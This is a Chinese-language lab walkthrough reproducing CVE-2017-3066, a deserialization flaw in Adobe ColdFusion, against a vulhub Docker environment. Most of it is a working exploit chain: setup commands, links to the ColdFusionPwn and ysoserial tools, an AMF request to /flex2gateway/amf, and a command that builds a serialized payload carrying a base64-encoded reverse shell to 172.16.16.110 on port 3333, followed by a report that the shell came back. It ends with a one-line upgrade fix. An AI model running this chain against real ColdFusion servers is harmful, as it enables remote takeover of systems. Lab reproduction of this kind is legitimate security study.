CVE-2017-3066:Adobe ColdFusion 反序列化漏洞
0x01 漏洞简述
0x02 知识扩展
0x03 风险等级
0x04 影响版本
0x05 漏洞搭建
http://vulfocus.fofa.so
sudo apt-get install docker
systemctl start docker
git clone --depth=1https://github.com.cnpmjs.org/vulhub/vulhub.git
service docker start
1)进入漏洞中
cd /root/vulhub/coldfusion/CVE-2017-3066
2)开启漏洞环境
docker-compose build && docker-composeup-d
3)环境启动成功后,访问
http://172.16.16.109:8500/CFIDE/administrator/index.cfm
输入密码vulhub,即可成功安装Adobe ColdFusion。
1)下载ColdFusionPwnhttps://github.com/codewhitesec/ColdFusionPwn/releases/download/0.0.1/ColdFusionPwn-0.0.1-SNAPSHOT-all.jar
2)下载ysoserial
https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
3)将下载的安装包更改名字,放入kali中
ysoserial-master-SNAPSHOT.jar更改为ysoserial.jar
ColdFusionPwn-0.0.1-SNAPSHOT-all.jar更改为ColdFusionPwn.jar
4)在kali中执行命令
5)查看poc.ser
6)生成poc.ser文件后,抓包后POC作为数据包body使用burpsuit发送给
http://your-ip:8500/flex2gateway/amf,Content-Type为application/x-amf:
注意:右击选择Paste From File,上传poc.cer文件
POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853
7)发送后我们查看响应头为HTTP/1.1 200 OK,发送成功。
8)Docker ps -a 发现成功建立了一个容器。
0x06 漏洞复现
1)我们利用ColdFusionPwn生成攻击的exp.ser,将POC改成反弹命令,再通过burpsuit上传。
sudo java -cp ColdFusionPwn.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTYuMTEwLzMzMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" exp.ser
2)我们需要把之前的
'touch /tmp/CVE-2017-3066_is_success'换为我们的bash -i >& /dev/tcp/172.16.16.110/3333 0>&1
注意需要进行bash64编译。查看exp.ser
3)抓取数据包并改包,利用brupsuit 将exp.ser上传到我们的靶机中。
4)响应头显示HTTP/1.1 200 OK,发送成功
5)返回我们的kali中,发现shell成功返还。
0x07 修复建议
下载最新版本
coldfusion https://www.adobe.com/products/coldfusion-family.html